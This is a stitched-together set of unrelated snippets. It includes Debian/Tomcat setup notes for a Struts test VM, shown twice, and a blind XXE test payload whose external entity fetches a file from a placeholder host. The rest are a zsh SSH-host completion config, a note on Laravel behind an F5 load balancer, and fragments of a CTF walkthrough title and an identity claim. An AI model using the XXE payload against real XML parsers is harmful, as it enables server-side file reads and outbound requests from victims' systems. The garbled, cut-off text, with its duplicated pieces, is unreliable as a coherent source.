Version 1
Debian installed as VM. Single Struts app, just to test the install process.
apt-get update && apt-get -y upgrade
apt-get install tomcat8 maven
cd to project directory
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
Version 1
Debian installed as VM. Single Struts app, just to test the install process.
apt-get update && apt-get -y upgrade
apt-get install tomcat8 maven
cd to project directory
# Custom hosts completion from included SSH configs: | |
zstyle -e ':completion:*:hosts' hosts 'reply=( | |
${=${=${=${${(f)"$(cat {/etc/ssh_,~/.ssh/known_}hosts(|2)(N) 2>/dev/null)"}%%[#| ]*}//\]:[0-9]*/ }//,/ }//\[/ } | |
${=${(f)"$(cat /etc/hosts(|)(N) <<(ypcat hosts 2>/dev/null))"}%%\#*} | |
${=${${${${(@M)${(f)"$(cat ~/.ssh/config 2>/dev/null)"}:#Host *}#Host }:#*\**}:#*\?*}} | |
${=${${${${(@M)${(f)"$(cat ~/.ssh/config.d/* 2>/dev/null)"}:#Host *}#Host }:#*\**}:#*\?*}} | |
)' | |
# The last line above supports reading from files inside a local SSH configuration directory. It pulls |
A Laravel 5.1 Application behind a BigIP F5 load-balancer applicance, which performed the SSL termination. The traffic from F5 to Laravel is only over Port 80 (internal 'secure' network) and Laravel itself thinks it is insecure, and thus all URLs to internal resources were 'http'. We also wanted to maintain the ability to serve certain unauthenticated content over HTTP.
These F5 load-balancers can roll all connections up to HTTPS, however in this instance we did not wish to perform this as the Laravel application is designed to intercept connections for another decommissioned application which served SSL and Non-SSL connections.
Quick Walkthrough for Ew Skuzzy!
I hereby claim:
To claim this, I am signing this object: